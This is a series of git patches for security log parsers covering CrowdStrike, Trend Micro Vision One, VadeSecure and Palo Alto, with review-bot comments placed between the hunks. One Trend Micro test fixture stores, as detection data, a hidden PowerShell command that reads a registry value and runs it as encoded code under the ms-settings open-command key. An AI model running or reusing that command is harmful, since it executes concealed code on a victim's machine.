"7808b91ddf218cd9da382d42b2c5d07816964019976550f69aefe26182f6c324a5df8bafc9cd79167e09d4a339cfd33d5e7ba87342f459aae8e125fc64d42423" + }, + "name": "image001.jpg", + "size": 5130 + } + } + ], + "from": { + "address": "john.doe@mail.fr" + }, + "local_id": "csb6q1pgfisg9knp1l5g", + "message_id": "", + "subject": "Re: Your mail", + "to": { + "address": "alan.smithee@company.fr" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "vadesecure": { + "attachments": [ + { + 
"filename": "image001.jpg", + "id": "12345678901234567890" + } + ], + "auth_results_details": { + "dkim": "fail", + "dmarc": "none", + "spf": "temperror" + }, + "from_header": "John DOE ", + "last_report_date": "0001-01-01T00:00:00Z", + "overdict": "clean", + "status": "LEGIT", + "to_header": "Alan Smithee ", + "whitelist": "false" + } + } +} \ No newline at end of file From cb5456827e5201fd75229cc4770a445a72738be0 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 19 Nov 2024 11:59:10 +0100 Subject: [PATCH 254/317] CrowdStrike telemetry: fix on parsing error --- CrowdStrike/crowdstrike-telemetry/_meta/fields.yml | 5 ----- CrowdStrike/crowdstrike-telemetry/ingest/parser.yml | 7 ++----- .../crowdstrike-telemetry/tests/telemetry_event_26.json | 5 ++++- 3 files changed, 6 insertions(+), 11 deletions(-) diff --git a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml index 75e1b7434..a59b68006 100644 --- a/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml +++ b/CrowdStrike/crowdstrike-telemetry/_meta/fields.yml @@ -1,8 +1,3 @@ -crowdstrike.base_filename: - description: Base Filename - name: crowdstrike.base_filename - type: keyword - crowdstrike.customer_id: description: Customer ID (cid) name: crowdstrike.customer_id diff --git a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml index 03e9819e7..5d0069c0a 100644 --- a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml +++ b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml @@ -53,9 +53,6 @@ stages: "host.domain": "{{parsed_event.message.MachineDomain}}" "host.mac": "{{parsed_event.message.MAC}}" - - set: - crowdstrike.base_filename: "{{parsed_event.message.ContextBaseFileName}}" - set_registry_fields: actions: - set: 
@@ -180,9 +177,9 @@ stages: - set: "event.action": "{{parsed_event.message.event_simpleName}}" - "process.command_line": "{{parsed_event.message.CommandLine}}" + "process.command_line": "{{parsed_event.message.CommandLine or parsed_event.message.ContextBaseFileName}}" "process.executable": "{{parsed_event.message.ImageFileName}}" - "process.name": "{{parsed_event.message.ImageFileName | basename}}" + "process.name": "{{parsed_event.message.ImageFileName | basename or parsed_event.message.ContextBaseFileName}}" "process.thread.id": "{{parsed_event.message.SourceThreadId | int}}" "process.parent.name": "{{parsed_event.message.ParentBaseFileName}}" "process.parent.pid": "{{parsed_event.message.ParentProcessId}}" diff --git a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json index 1e7368eee..01e9a933f 100644 --- a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json +++ b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json @@ -18,7 +18,6 @@ "id": "111111111111111" }, "crowdstrike": { - "base_filename": "svchost.exe", "customer_id": "222222222222222222222" }, "file": { @@ -34,6 +33,10 @@ "platform": "win" } }, + "process": { + "command_line": "svchost.exe", + "name": "svchost.exe" + }, "related": { "ip": [ "4.3.2.1" From fa87d4f91aea0f4fe26bdcaa466793c87268fddf Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 20 Nov 2024 10:51:50 +0200 Subject: [PATCH 255/317] Smart descs --- .../trend-micro-vision-one/_meta/smart-descriptions.json | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json index 7a3ee9d51..742eee7cc 100644 --- a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json +++ b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json 
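Review bot: Falling back to `ContextBaseFileName` for `process.command_line` writes a bare file name (`svchost.exe` in `telemetry_event_26.json`) into a field that rules read as the full invocation, so a query such as `process.command_line` contains `-enc` or a quoted path now silently misses these events while the field looks populated. The same fallback on `process.name` is fine, since a base name is what that field holds. I would drop the `or` on the command-line mapping, keeping `"process.command_line": "{{parsed_event.message.CommandLine}}"`, and if the base name must survive for events without an image path, the `crowdstrike.base_filename` field removed in this commit was the right home for it. The enclosing `set` action may continue past the end of the hunk.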
@@ -1,4 +1,8 @@ [ + { + "value": "{event.reason} on {host.ip}", + "conditions": [{ "field": "event.reason" }, { "field": "host.ip" }] + }, { "value": "{event.reason}", "conditions": [{ "field": "event.reason" }] From 7b8703b20c6bbccf5d801d9dda0f06c9b05431ce Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 20 Nov 2024 12:24:27 +0200 Subject: [PATCH 256/317] Fixes and improvements --- .../trend-micro-vision-one/ingest/parser.yml | 22 +++++++++++-------- .../tests/test_registry.json | 3 ++- 2 files changed, 15 insertions(+), 10 deletions(-) diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml index be400399d..a13ee54b2 100644 --- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml 
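Review bot: `{host.ip}` in the new description renders whatever this intake stores under `host.ip`, and ECS treats that field as multi-valued, so if the parser fills it as a list the summary shows a bracketed list rather than one address; nothing in this patch shows how the Vision One parser populates `host.ip`, so please confirm before relying on it. If a single scalar is not guaranteed, `host.name` is the safer pivot: `"value": "{event.reason} on {host.name}"` with `{ "field": "host.name" }` in the conditions, keeping this `host.ip` variant as the next fallback.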
@@ -39,14 +39,19 @@ stages: event.url: "{{parsed_event.message.model.workbenchLink}}" + - set: process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" + process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" + - set: registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}" registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" - registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}" - registry.path: > {%- set path = [] -%} {%- for indicator in parsed_event.message.indicators -%} 
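Review bot: The `registry.value` mapping (indicator type `registry_value`) is removed in this hunk and, as far as the patch shows, not re-added anywhere: the diffstat for this file (13 insertions, 9 deletions) is fully accounted for by the two hunks visible here, while `registry.data.strings` from `registry_value_data` is kept in the next hunk. That leaves the written data without the name of the value it was written to, which is what a persistence rule on a `Run` entry or on the default value of `ms-settings\shell\open\command` (the `test_registry.json` case) pivots on. If the removal is deliberate because `registry.path` already ends with the value name, a one-line comment saying so would help; otherwise I would restore `registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}"` in the new `set` block.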
@@ -57,22 +62,21 @@ stages: {%- endfor -%} {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} - # @todo should be along with registry.data.type to REG_SZ registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}" + - set: + registry.data.type: "REG_SZ" + filter: "{{final.registry.data.strings != null }}" + + - set: file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}" file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}" file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}" file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}" - process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" - process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" - process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" - process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" - process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" - user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}" + - set: trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}" trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}" 
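Review bot: `registry.data.type: "REG_SZ"` is asserted for every event that has a `registry_value_data` indicator, but nothing in that indicator tells the parser the value's real type, so expanded or multi-string data would be mislabelled; the constant deserves a comment such as `# Vision One does not expose the registry value type; REG_SZ is assumed for any string data`, replacing the todo the hunk deletes. The filter `final.registry.data.strings != null` depends on the preceding `set` having already run, which the ordering shown here provides.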
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json index f9873edf1..3c32834ae 100644 --- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -41,7 +41,8 @@ }, "registry": { "data": { - "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x" + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x", + "type": "REG_SZ" }, "hive": "hkcr", "key": "ms-settings\\shell\\open\\command", From bc86ba96e28498fa916cca216790f5b8094d6d16 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 20 Nov 2024 15:51:21 +0200 Subject: [PATCH 257/317] Add test --- .../tests/test_internal_network_scanner.json | 74 +++++++++++++++++++ 1 file changed, 74 insertions(+) create mode 100644 Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json new file mode 100644 index 000000000..e6bcf0088 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json 
@@ -0,0 +1,74 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", 
\"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], 
\"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", 
\"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": 
\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Internal Network Scanner", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-23T14:46:11Z", + "file": { + "directory": "C:\\Users\\doe.john\\Downloads", + "hash": { + "sha256": "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + }, + "name": "Advanced_IP_Scanner_2.5.4594.1.exe", + "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe" + }, + "host": { + "ip": [ + "1.2.3.4" + ], + "name": "doe10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "organization": { + "id": "john\\doe", + "name": "john\\doe" + }, + "process": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631" + } + }, + "related": { + "hash": [ + "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631", + "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "doe" + ] + }, + "rule": { + "name": "Internal Network Scanner" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": 
"New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "name": "doe" + } + } +} \ No newline at end of file From f2de94f0d1331ad57d49d1dcd514a59ee4fce317 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?L=C3=A9na=C3=AFg?= <126670263+LenaigKaliou@users.noreply.github.com> Date: Wed, 20 Nov 2024 16:13:59 +0100 Subject: [PATCH 258/317] Update VadeSecure/vade_secure_m365/_meta/fields.yml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-authored-by: Sébastien Quioc --- VadeSecure/vade_secure_m365/_meta/fields.yml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index a3f60b15c..3dae6aab9 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,10 +58,20 @@ vadesecure.attachments: short: vadesecure.to_header type: array -vadesecure.auth_results_details: - description: Details of security protocols, mostly SPF, DKIM and DMARC. - name: vadesecure.auth_results_details - type: object +vadesecure.auth_results_details.spf: + description: The result of the Sender Policy Framework (SPF) + name: vadesecure.auth_results_details.spf + type: keyword + +vadesecure.auth_results_details.dkim: + description: The result of the DomainKeys Identified Mail (DKIM) + name: vadesecure.auth_results_details.dkim + type: keyword + +vadesecure.auth_results_details.dmarc: + description: Result of the Domand-based Message Authentication Reporting and Conformance (DMARC) + name: vadesecure.auth_results_details.dmarc + type: keyword vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. From 89031da02131389356f2da10693a5c1a31cbdac1 Mon Sep 17 00:00:00 2001 
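Review bot: `input.message` and `expected.message` are not the same string: the `workbenchLink` in the input ends in `?ref=7ddf32e17a6ac5ce04a8ecbf782ca509` while the expected copy ends in `?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3`, so the fixture fails on `message` if the harness compares it and looks like two separate anonymisation passes. Copy the input string verbatim into `expected.message`, or use one `ref` value in both. The expected output also carries no `event.url` although the input has a `workbenchLink`, consistent with the parser reading `parsed_event.message.model.workbenchLink` where `model` is the string "Internal Network Scanner" — presumably `parsed_event.message.workbenchLink` was intended, worth confirming. The file is also written without a trailing newline, unlike the hipmatch fixture created later in the series.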
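Review bot: the DMARC entry spells it `Domand-based`; the line should read `description: Result of the Domain-based Message Authentication, Reporting and Conformance (DMARC)`. The linting follow-up on the next hunk re-wraps and re-orders this entry but keeps the typo, so fix it in both places. Replacing the `object` field `vadesecure.auth_results_details` with three keyword subfields also means any other key the source may put under `auth_results_details` is no longer declared — fine if SPF, DKIM and DMARC are the only ones, otherwise worth a comment.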
From: LenaigKaliou Date: Wed, 20 Nov 2024 16:17:44 +0100 Subject: [PATCH 259/317] fix on linting --- VadeSecure/vade_secure_m365/_meta/fields.yml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/VadeSecure/vade_secure_m365/_meta/fields.yml b/VadeSecure/vade_secure_m365/_meta/fields.yml index 3dae6aab9..45923af39 100644 --- a/VadeSecure/vade_secure_m365/_meta/fields.yml +++ b/VadeSecure/vade_secure_m365/_meta/fields.yml @@ -58,21 +58,22 @@ vadesecure.attachments: short: vadesecure.to_header type: array -vadesecure.auth_results_details.spf: - description: The result of the Sender Policy Framework (SPF) - name: vadesecure.auth_results_details.spf - type: keyword - vadesecure.auth_results_details.dkim: description: The result of the DomainKeys Identified Mail (DKIM) name: vadesecure.auth_results_details.dkim type: keyword vadesecure.auth_results_details.dmarc: - description: Result of the Domand-based Message Authentication Reporting and Conformance (DMARC) + description: Result of the Domand-based Message Authentication Reporting and Conformance + (DMARC) name: vadesecure.auth_results_details.dmarc type: keyword +vadesecure.auth_results_details.spf: + description: The result of the Sender Policy Framework (SPF) + name: vadesecure.auth_results_details.spf + type: keyword + vadesecure.campaign.actions: description: The actions carried out for the remediation campaign. name: vadesecure.campaign.actions From ddb81e469ab08e04985947091be03113e7236a49 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:08:00 +0100 Subject: [PATCH 260/317] chore(PaloAlto): name some columns --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index 2f8b22f2a..c81ad890e 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
@@ -142,7 +142,7 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USER
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
@@ -187,12 +187,12 @@ pipeline:
 input_field: original.message
 output_field: message
 columnnames:
- - FUTURE_USE
+ - PaloAltoDomain
 - ReceiveTime
 - DeviceSN
 - Type
 - Subtype
- - FUTURE_USE
+ - ConfigVersion
 - GeneratedTime
 - VirtualLocation
 - EventID
From 03c2c78afb7a413856adddbbe760f167de860cd8 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Wed, 20 Nov 2024 18:08:44 +0100
Subject: [PATCH 261/317] fix(PaloAlto): fix the definition of the user properties
---
 Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 4 ++--
 .../paloalto-ngfw/tests/network_threat_alert_2.json | 6 +++---
 .../paloalto-ngfw/tests/test_file_alert_json.json | 6 +++---
 Palo Alto Networks/paloalto-ngfw/tests/wildfire1_json.json | 6 +++---
 4 files changed, 11 insertions(+), 11 deletions(-)
diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
index c81ad890e..b7ec21cac 100644
--- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
+++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml
@@ -810,8 +810,8 @@ stages:
 user.name: '{{final.user.name.split("\\") | last}}'
 filter: '{{final.user.name != null and "\\" in final.user.name}}'
 - set:
- user.domain: '{{final.user.email.split("@") | first}}'
- user.name: '{{final.user.email.split("@") | last}}'
+ user.domain: '{{final.user.email.split("@") | last}}'
+ user.name: '{{final.user.email.split("@") | first}}'
 filter: '{{final.user.email != null and "@" in final.user.email}}'
 - set:
